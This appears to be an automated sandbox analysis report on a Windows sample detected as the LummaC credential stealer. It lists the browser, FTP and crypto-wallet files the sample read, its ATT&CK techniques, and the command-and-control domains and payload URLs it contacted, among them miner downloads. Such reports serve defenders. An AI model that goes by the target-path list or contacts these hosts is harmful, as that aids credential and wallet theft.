Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior

Source: Yara match	File source: 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1081894496.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1082401555.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: setupx 1.exe1.exe PID: 6848, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: setupx 1.exe1.exe PID: 6848, type: MEMORYSTR
Source: Yara match	File source: 2.2.setupx 1.exe1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.setupx 1.exe1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2253160823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	141 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	11 Deobfuscate/Decode Files or Information	LSASS Memory	11 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	13 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	211 Process Injection	4 Obfuscated Files or Information	Security Account Manager	44 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	1 Scheduled Task/Job	2 Software Packing	NTDS	371 Security Software Discovery	Distributed Component Object Model	3 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	Keylogging	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	261 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	261 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
setupx 1.exe1.exe	66%	Virustotal		Browse
setupx 1.exe1.exe	66%	ReversingLabs	Win32.Trojan.LummaC
setupx 1.exe1.exe	100%	Avira	TR/Crypt.Agent.ivuts

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\Dllhost\WinRing0x64.sys	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://185.215.113.51/conhost.exe:	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJISre	0%	Avira URL Cloud	safe
http://185.215.113.51/WatchDogee	0%	Avira URL Cloud	safe
http://185.215.113.51/D	0%	Avira URL Cloud	safe
https://citydisco.bet/D	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJISAAIA	0%	Avira URL Cloud	safe
http://185.215.113.51/J	0%	Avira URL Cloud	safe
http://185.215.113.51/C	0%	Avira URL Cloud	safe
https://citydisco.bet:443/gdJIS71025-5-	0%	Avira URL Cloud	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	0%	Avira URL Cloud	safe
https://citydisco.bet/Vs16c	0%	Avira URL Cloud	safe
http://crl.mi	0%	Avira URL Cloud	safe
http://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.exe	100%	Avira URL Cloud	malware
https://citydisco.bet/gdJIS6	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
citydisco.bet	188.114.97.3	true	false		high
pastebin.com	172.67.19.24	true	false		high

Contacted URLs

Name	Malicious	Reputation
bugildbett.top/bAuz	false	high
citydisco.bet/gdJIS	false	high
http://185.215.113.51/WinRing0x64.sys	false	high
https://pastebin.com/raw/YpJeSRBC	false	high
cjlaspcorne.icu/DbIps	false	high
mrodularmall.top/aNzS	false	high
jowinjoinery.icu/bdWUa	false	high
legenassedk.top/bdpWO	false	high
http://185.215.113.51/xmrig.exe	false	high
featureccus.shop/bdMAn	false	high
htardwarehu.icu/Sbdsa	false	high
https://citydisco.bet/gdJIS	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.51/WatchDog.exe	ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	false		high
